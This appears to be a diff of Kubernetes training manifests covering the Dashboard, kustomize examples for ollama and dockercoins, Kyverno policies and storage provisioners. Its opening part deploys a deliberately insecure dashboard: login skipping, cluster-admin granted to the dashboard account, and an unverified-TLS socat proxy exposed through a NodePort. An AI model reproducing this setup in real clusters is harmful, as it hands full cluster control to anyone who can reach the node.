spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: kubernetesui/dashboard:v2.0.0-rc2
imagePullPolicy: Always
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
- --namespace=kubernetes-dashboard
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
- --enable-skip-login
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsUser: 1001
runAsGroup: 2001
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
nodeSelector:
"beta.kubernetes.io/os": linux
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: dashboard-metrics-scraper
name: dashboard-metrics-scraper
namespace: kubernetes-dashboard
spec:
ports:
- port: 8000
targetPort: 8000
selector:
k8s-app: dashboard-metrics-scraper
---
kind: Deployment
apiVersion: apps/v1
metadata:
labels:
k8s-app: dashboard-metrics-scraper
name: dashboard-metrics-scraper
namespace: kubernetes-dashboard
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: dashboard-metrics-scraper
template:
metadata:
labels:
k8s-app: dashboard-metrics-scraper
annotations:
seccomp.security.alpha.kubernetes.io/pod: 'runtime/default'
spec:
containers:
- name: dashboard-metrics-scraper
image: kubernetesui/metrics-scraper:v1.0.2
ports:
- containerPort: 8000
protocol: TCP
livenessProbe:
httpGet:
scheme: HTTP
path: /
port: 8000
initialDelaySeconds: 30
timeoutSeconds: 30
volumeMounts:
- mountPath: /tmp
name: tmp-volume
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsUser: 1001
runAsGroup: 2001
serviceAccountName: kubernetes-dashboard
nodeSelector:
"beta.kubernetes.io/os": linux
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
volumes:
- name: tmp-volume
emptyDir: {}
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: dashboard
name: dashboard
spec:
selector:
matchLabels:
app: dashboard
template:
metadata:
labels:
app: dashboard
spec:
containers:
- args:
- sh
- -c
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kubernetes-dashboard:443,verify=0
image: alpine
name: dashboard
---
apiVersion: v1
kind: Service
metadata:
labels:
app: dashboard
name: dashboard
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: dashboard
type: NodePort
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: insecure-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard

View File

@@ -0,0 +1,162 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------- Dashboard Secret ------------------- #
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kube-system
type: Opaque
---
# ------------------- Dashboard Service Account ------------------- #
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Role & Role Binding ------------------- #
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
rules:
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
resources: ["secrets"]
verbs: ["create"]
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["create"]
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Deployment ------------------- #
kind: Deployment
apiVersion: apps/v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.10.1
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
# ------------------- Dashboard Service ------------------- #
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard

View File

@@ -1,12 +0,0 @@
# This removes the haproxy Deployment.
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
patches:
- patch: |-
$patch: delete
kind: Deployment
apiVersion: apps/v1
metadata:
name: haproxy

View File

@@ -1,14 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
# Within a Kustomization, it is not possible to specify in which
# order transformations (patches, replacements, etc) should be
# executed. If we want to execute transformations in a specific
# order, one possibility is to put them in individual components,
# and then invoke these components in the order we want.
# It works, but it creates an extra level of indirection, which
# reduces readability and complicates maintenance.
components:
- setup
- cleanup

View File

@@ -1,20 +0,0 @@
global
#log stdout format raw local0
#daemon
maxconn 32
defaults
#log global
timeout client 1h
timeout connect 1h
timeout server 1h
mode http
option abortonclose
frontend metrics
bind :9000
http-request use-service prometheus-exporter
frontend ollama_frontend
bind :8000
default_backend ollama_backend
maxconn 16
backend ollama_backend
server ollama_server localhost:11434 check

View File

@@ -1,39 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: haproxy
name: haproxy
spec:
selector:
matchLabels:
app: haproxy
template:
metadata:
labels:
app: haproxy
spec:
volumes:
- name: haproxy
configMap:
name: haproxy
containers:
- image: haproxy:3.0
name: haproxy
volumeMounts:
- name: haproxy
mountPath: /usr/local/etc/haproxy
readinessProbe:
httpGet:
port: 9000
ports:
- name: haproxy
containerPort: 8000
- name: metrics
containerPort: 9000
resources:
requests:
cpu: 0.05
limits:
cpu: 1

View File

@@ -1,75 +0,0 @@
# This adds a sidecar to the ollama Deployment, by taking
# the pod template and volumes from the haproxy Deployment.
# The idea is to allow to run ollama+haproxy in two modes:
# - separately (each with their own Deployment),
# - together in the same Pod, sidecar-style.
# The YAML files define how to run them separetely, and this
# "replacements" directive fetches a specific volume and
# a specific container from the haproxy Deployment, to add
# them to the ollama Deployment.
#
# This would be simpler if kustomize allowed to append or
# merge lists in "replacements"; but it doesn't seem to be
# possible at the moment.
#
# It would be even better if kustomize allowed to perform
# a strategic merge using a fieldPath as the source, because
# we could merge both the containers and the volumes in a
# single operation.
#
# Note that technically, it might be possible to layer
# multiple kustomizations so that one generates the patch
# to be used in another; but it wouldn't be very readable
# or maintainable so we decided to not do that right now.
#
# However, the current approach (fetching fields one by one)
# has an advantage: it could let us transform the haproxy
# container into a real sidecar (i.e. an initContainer with
# a restartPolicy=Always).
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
resources:
- haproxy.yaml
configMapGenerator:
- name: haproxy
files:
- haproxy.cfg
replacements:
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.volumes.[name=haproxy]
targets:
- select:
kind: Deployment
name: ollama
fieldPaths:
- spec.template.spec.volumes.[name=haproxy]
options:
create: true
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.containers.[name=haproxy]
targets:
- select:
kind: Deployment
name: ollama
fieldPaths:
- spec.template.spec.containers.[name=haproxy]
options:
create: true
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.containers.[name=haproxy].ports.[name=haproxy].containerPort
targets:
- select:
kind: Service
name: ollama
fieldPaths:
- spec.ports.[name=11434].targetPort

View File

@@ -1,34 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: blue
name: blue
spec:
replicas: 2
selector:
matchLabels:
app: blue
template:
metadata:
labels:
app: blue
spec:
containers:
- image: jpetazzo/color
name: color
ports:
- containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
labels:
app: blue
name: blue
spec:
ports:
- port: 80
selector:
app: blue

View File

@@ -1,94 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
# Each of these YAML files contains a Deployment and a Service.
# The blue.yaml file is here just to demonstrate that the rest
# of this Kustomization can be precisely scoped to the ollama
# Deployment (and Service): the blue Deployment and Service
# shouldn't be affected by our kustomize transformers.
resources:
- ollama.yaml
- blue.yaml
buildMetadata:
# Add a label app.kubernetes.io/managed-by=kustomize-vX.Y.Z
- managedByLabel
# Add an annotation config.kubernetes.io/origin, indicating:
# - which file defined that resource;
# - if it comes from a git repository, which one, and which
# ref (tag, branch...) it was.
- originAnnotations
# Add an annotation alpha.config.kubernetes.io/transformations
# indicating which patches and other transformers have changed
# each resource.
- transformerAnnotations
# Let's generate a ConfigMap with literal values.
# Note that this will actually add a suffix to the name of the
# ConfigMaps (e.g.: ollama-8bk8bd8m76) and it will update all
# references to the ConfigMap (e.g. in Deployment manifests)
# accordingly. The suffix is a hash of the ConfigMap contents,
# so that basically, if the ConfigMap is edited, any workload
# using that ConfigMap will automatically do a rolling update.
configMapGenerator:
- name: ollama
literals:
- "model=gemma3:270m"
- "prompt=If you visit Paris, I suggest that you"
- "queue=4"
name: ollama
patches:
# The Deployment manifest in ollama.yaml doesn't specify
# resource requests and limits, so that it can run on any
# cluster (including resource-constrained local clusters
# like KiND or minikube). The example belows add CPU
# requests and limits using a strategic merge patch.
# The patch is inlined here, but it could also be put
# in a file and referenced with "path: xxxxxx.yaml".
- patch: |
apiVersion: apps/v1
kind: Deployment
metadata:
name: ollama
spec:
template:
spec:
containers:
- name: ollama
resources:
requests:
cpu: 1
limits:
cpu: 2
# This will have the same effect, with one little detail:
# JSON patches cannot specify containers by name, so this
# assumes that the ollama container is the first one in
# the pod template (whereas the strategic merge patch can
# use "merge keys" and identify containers by their name).
#- target:
# kind: Deployment
# name: ollama
# patch: |
# - op: add
# path: /spec/template/spec/containers/0/resources
# value:
# requests:
# cpu: 1
# limits:
# cpu: 2
# A "component" is a bit like a "base", in the sense that
# it lets us define some reusable resources and behaviors.
# There is a key different, though:
# - a "base" will be evaluated in isolation: it will
# generate+transform some resources, then these resources
# will be included in the main Kustomization;
# - a "component" has access to all the resources that
# have been generated by the main Kustomization, which
# means that it can transform them (with patches etc).
components:
- add-haproxy-sidecar

View File

@@ -1,73 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: ollama
name: ollama
spec:
selector:
matchLabels:
app: ollama
template:
metadata:
labels:
app: ollama
spec:
volumes:
- name: ollama
hostPath:
path: /opt/ollama
type: DirectoryOrCreate
containers:
- image: ollama/ollama
name: ollama
env:
- name: OLLAMA_MAX_QUEUE
valueFrom:
configMapKeyRef:
name: ollama
key: queue
- name: MODEL
valueFrom:
configMapKeyRef:
name: ollama
key: model
volumeMounts:
- name: ollama
mountPath: /root/.ollama
lifecycle:
postStart:
exec:
command:
- /bin/sh
- -c
- ollama pull $MODEL
livenessProbe:
httpGet:
port: 11434
readinessProbe:
exec:
command:
- /bin/sh
- -c
- ollama show $MODEL
ports:
- name: ollama
containerPort: 11434
---
apiVersion: v1
kind: Service
metadata:
labels:
app: ollama
name: ollama
spec:
ports:
- name: "11434"
port: 11434
protocol: TCP
targetPort: 11434
selector:
app: ollama
type: ClusterIP

View File

@@ -1,5 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- microservices
- redis

View File

@@ -1,13 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- microservices.yaml
transformers:
- |
apiVersion: builtin
kind: PrefixSuffixTransformer
metadata:
name: use-ghcr-io
prefix: ghcr.io/
fieldSpecs:
- path: spec/template/spec/containers/image

View File

@@ -1,125 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker

View File

@@ -1,4 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- redis.yaml

View File

@@ -1,35 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP

View File

@@ -1,160 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker

View File

@@ -1,30 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- dockercoins.yaml
replacements:
- sourceValue: ghcr.io/dockercoins
targets:
- select:
kind: Deployment
labelSelector: "app in (hasher,rng,webui,worker)"
# It will soon be possible to use regexes in replacement selectors,
# meaning that the "labelSelector:" above can be replaced with the
# following "name:" selector which is a tiny bit simpler:
#name: hasher|rng|webui|worker
# Regex support in replacement selectors was added by this PR:
# https://github.com/kubernetes-sigs/kustomize/pull/5863
# This PR was merged in August 2025, but as of October 2025, the
# latest release of Kustomize is 5.7.1, which was released in July.
# Hopefully the feature will be available in the next release :)
# Another possibility would be to select all Deployments, and then
# reject the one(s) for which we don't want to update the registry;
# for instance:
#reject:
# kind: Deployment
# name: redis
fieldPaths:
- spec.template.spec.containers.*.image
options:
delimiter: "/"
index: 0

View File

@@ -1,28 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
number: 80
path: /
pathType: Prefix

View File

@@ -1,32 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
preconditions:
- key: "{{request.object.spec.ports[0].name}}"
operator: Equals
value: http
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,32 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
preconditions:
- key: http
operator: In
value: "{{request.object.spec.ports[*].name}}"
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,34 +0,0 @@
# Note: this policy uses the operator "AnyIn", which was introduced in Kyverno 1.6.
# (This policy won't work with Kyverno 1.5!)
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
preconditions:
- key: "{{request.object.spec.ports[*].port}}"
operator: AnyIn
value: [ 80 ]
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,37 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
context:
- name: configmap
configMap:
name: ingress-domain-name
namespace: "{{request.object.metadata.namespace}}"
match:
resources:
kinds:
- Service
preconditions:
- key: "{{request.object.spec.ports[0].name}}"
operator: Equals
value: http
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.{{configmap.data.domain}}"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,63 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: setup-namespace
spec:
rules:
- name: setup-limitrange
match:
resources:
kinds:
- Namespace
generate:
kind: LimitRange
name: default-limitrange
namespace: "{{request.object.metadata.name}}"
data:
spec:
limits:
- type: Container
min:
cpu: 0.1
memory: 0.1
max:
cpu: 2
memory: 2Gi
default:
cpu: 0.25
memory: 500Mi
defaultRequest:
cpu: 0.25
memory: 250Mi
- name: setup-resourcequota
match:
resources:
kinds:
- Namespace
generate:
kind: ResourceQuota
name: default-resourcequota
namespace: "{{request.object.metadata.name}}"
data:
spec:
hard:
requests.cpu: "10"
requests.memory: 10Gi
limits.cpu: "20"
limits.memory: 20Gi
- name: setup-networkpolicy
match:
resources:
kinds:
- Namespace
generate:
kind: NetworkPolicy
name: default-networkpolicy
namespace: "{{request.object.metadata.name}}"
data:
spec:
podSelector: {}
ingress:
- from:
- podSelector: {}

View File

@@ -1,22 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: pod-color-policy-1
spec:
rules:
- name: ensure-pod-color-is-valid
match:
resources:
kinds:
- Pod
selector:
matchExpressions:
- key: color
operator: Exists
- key: color
operator: NotIn
values: [ red, green, blue ]
validate:
failureAction: Enforce
message: "If it exists, the label color must be red, green, or blue."
deny: {}

View File

@@ -1,31 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: pod-color-policy-2
spec:
background: false
rules:
- name: prevent-color-change
match:
resources:
kinds:
- Pod
preconditions:
- key: "{{ request.operation }}"
operator: Equals
value: UPDATE
- key: "{{ request.oldObject.metadata.labels.color || '' }}"
operator: NotEquals
value: ""
- key: "{{ request.object.metadata.labels.color || '' }}"
operator: NotEquals
value: ""
validate:
failureAction: Enforce
message: "Once label color has been added, it cannot be changed."
deny:
conditions:
- key: "{{ request.object.metadata.labels.color }}"
operator: NotEquals
value: "{{ request.oldObject.metadata.labels.color }}"

View File

@@ -1,26 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: pod-color-policy-3
spec:
background: false
rules:
- name: prevent-color-change
match:
resources:
kinds:
- Pod
preconditions:
- key: "{{ request.operation }}"
operator: Equals
value: UPDATE
- key: "{{ request.oldObject.metadata.labels.color || '' }}"
operator: NotEquals
value: ""
- key: "{{ request.object.metadata.labels.color || '' }}"
operator: Equals
value: ""
validate:
failureAction: Enforce
message: "Once label color has been added, it cannot be removed."
deny: {}

View File

@@ -1,46 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: tls-for-ingress
spec:
rules:
- name: create-role
match:
resources:
kinds:
- Certificate
generate:
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
rules:
- verbs:
- get
apiGroups:
- ""
resources:
- secrets
resourceNames:
- "{{request.object.metadata.name}}"
- name: create-rolebinding
match:
resources:
kinds:
- Certificate
generate:
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: "{{request.object.metadata.name}}"
subjects:
- kind: ServiceAccount
name: default
namespace: "{{request.object.metadata.namespace}}"

View File

@@ -1,50 +1,49 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
---
apiVersion: v1
kind: Namespace
metadata:
name: local-path-storage
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: local-path-provisioner-role
namespace: local-path-storage
rules:
- apiGroups: [ "" ]
resources: [ "nodes", "persistentvolumeclaims", "configmaps" ]
verbs: [ "get", "list", "watch" ]
- apiGroups: [ "" ]
resources: [ "endpoints", "persistentvolumes", "pods" ]
verbs: [ "*" ]
- apiGroups: [ "" ]
resources: [ "events" ]
verbs: [ "create", "patch" ]
- apiGroups: [ "storage.k8s.io" ]
resources: [ "storageclasses" ]
verbs: [ "get", "list", "watch" ]
- apiGroups: [""]
resources: ["nodes", "persistentvolumeclaims"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["endpoints", "persistentvolumes", "pods"]
verbs: ["*"]
- apiGroups: [""]
resources: ["events"]
verbs: ["create", "patch"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: local-path-provisioner-bind
namespace: local-path-storage
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
name: local-path-provisioner-service-account
namespace: local-path-storage
- kind: ServiceAccount
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: apps/v1
kind: Deployment
@@ -63,28 +62,27 @@ spec:
spec:
serviceAccountName: local-path-provisioner-service-account
containers:
- name: local-path-provisioner
image: rancher/local-path-provisioner:v0.0.19
imagePullPolicy: IfNotPresent
command:
- local-path-provisioner
- --debug
- start
- --config
- /etc/config/config.json
volumeMounts:
- name: config-volume
mountPath: /etc/config/
env:
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
- name: local-path-provisioner
image: rancher/local-path-provisioner:v0.0.8
imagePullPolicy: Always
command:
- local-path-provisioner
- --debug
- start
- --config
- /etc/config/config.json
volumeMounts:
- name: config-volume
mountPath: /etc/config/
env:
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
volumes:
- name: config-volume
configMap:
name: local-path-config
---
apiVersion: storage.k8s.io/v1
kind: StorageClass
@@ -93,7 +91,6 @@ metadata:
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete
---
kind: ConfigMap
apiVersion: v1
@@ -102,59 +99,12 @@ metadata:
namespace: local-path-storage
data:
config.json: |-
{
"nodePathMap":[
{
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
"paths":["/opt/local-path-provisioner"]
}
]
}
setup: |-
#!/bin/sh
while getopts "m:s:p:" opt
do
case $opt in
p)
absolutePath=$OPTARG
;;
s)
sizeInBytes=$OPTARG
;;
m)
volMode=$OPTARG
;;
esac
done
mkdir -m 0777 -p ${absolutePath}
teardown: |-
#!/bin/sh
while getopts "m:s:p:" opt
do
case $opt in
p)
absolutePath=$OPTARG
;;
s)
sizeInBytes=$OPTARG
;;
m)
volMode=$OPTARG
;;
esac
done
rm -rf ${absolutePath}
helperPod.yaml: |-
apiVersion: v1
kind: Pod
metadata:
name: helper-pod
spec:
containers:
- name: helper-pod
image: busybox
{
"nodePathMap":[
{
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
"paths":["/opt/local-path-provisioner"]
}
]
}

View File

@@ -1,61 +1,32 @@
# This file is https://github.com/kubernetes-sigs/metrics-server/releases/latest/download/components.yaml
# But with the following arguments added to metrics-server:
# args:
# - --kubelet-insecure-tls
# - --metric-resolution=5s
apiVersion: v1
kind: ServiceAccount
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
